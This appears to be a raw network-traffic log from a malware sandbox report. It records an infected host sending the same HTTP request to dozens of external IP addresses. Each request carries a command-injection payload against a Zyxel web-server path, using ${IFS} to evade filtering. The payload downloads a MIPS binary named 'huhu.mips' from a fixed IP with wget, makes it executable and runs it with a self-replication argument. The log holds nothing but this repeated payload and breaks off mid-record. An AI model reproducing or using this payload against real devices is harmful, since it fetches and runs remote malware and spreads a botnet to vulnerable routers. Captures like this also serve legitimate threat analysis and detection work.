                                                Jan 29, 2024 07:07:55.493745089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6202192.168.2.2358536223.79.161.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493788004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6203192.168.2.2357126178.72.74.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493829012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6204192.168.2.234803895.48.8.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493885040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6205192.168.2.235753284.113.129.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493942976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6206192.168.2.234901639.171.163.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493947983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6207192.168.2.2355250112.12.42.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493989944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6208192.168.2.23481109.179.185.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494050026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6209192.168.2.2333206221.172.99.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494067907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6210192.168.2.2347708110.105.155.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494102955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6211192.168.2.2355948158.79.177.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494137049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6212192.168.2.2357648182.102.46.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494179010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6213192.168.2.234485865.108.25.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494214058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6214192.168.2.2343712191.238.29.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494246960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6215192.168.2.2360882201.64.99.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494292974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6216192.168.2.2360614121.236.140.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494317055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6217192.168.2.2339154187.173.50.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494362116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6218192.168.2.2339324110.18.253.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494398117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6219192.168.2.2351408207.54.54.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494440079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6220192.168.2.233580020.62.30.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494483948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6221192.168.2.2357778219.5.11.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494522095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6222192.168.2.2360858184.199.195.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494570017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6223192.168.2.2337912102.6.95.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494600058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6224192.168.2.2333316129.23.132.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494638920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6225192.168.2.2359638148.243.34.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494709015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6226192.168.2.2348652159.205.208.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494726896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6227192.168.2.2343616149.130.5.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494770050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6228192.168.2.2346244132.151.13.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494815111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6229192.168.2.235163236.175.73.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494874001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6230192.168.2.2338058101.66.221.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494924068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6231192.168.2.2356506198.117.21.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494924068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6232192.168.2.233386691.97.225.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.494983912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6233192.168.2.235584083.165.238.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495019913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6234192.168.2.233509499.208.243.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495049953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6235192.168.2.2352776112.239.185.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495095015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6236192.168.2.2358412152.57.141.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495137930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6237192.168.2.235906077.199.210.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495176077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6238192.168.2.2360908194.66.99.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495212078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6239192.168.2.2343484139.76.53.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495234966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6240192.168.2.2345558101.180.77.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495294094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6241192.168.2.234713427.128.23.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495351076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6242192.168.2.233798454.155.100.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495388985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6243192.168.2.233931469.205.123.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495424032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6244192.168.2.2345486100.172.251.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495482922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6245192.168.2.234280664.134.248.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495518923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6246192.168.2.2358892109.192.56.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495537996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6247192.168.2.2349904223.119.182.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495579004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6248192.168.2.23608048.178.36.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495614052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6249192.168.2.2353882155.38.115.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495654106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6250192.168.2.2350014213.82.243.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495691061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6251192.168.2.2334490100.15.54.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495740891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6252192.168.2.2357188192.236.109.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495784998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6253192.168.2.234772887.78.18.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495821953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6254192.168.2.2336894218.189.58.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495847940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6255192.168.2.233503084.20.71.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495893002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6256192.168.2.2334842145.229.113.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495913982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6257192.168.2.2355980167.195.73.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.495942116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6258192.168.2.2339304153.56.43.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496001005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6259192.168.2.2339974218.142.153.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496064901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6260192.168.2.2339998133.62.15.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496090889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6261192.168.2.2359232134.73.235.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496136904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6262192.168.2.2333092138.176.180.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496181011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6263192.168.2.234288680.12.78.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496197939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6264192.168.2.233747043.85.141.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496244907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6265192.168.2.2356956198.78.23.54443
                                                TimestampBytes transferredDirectionData
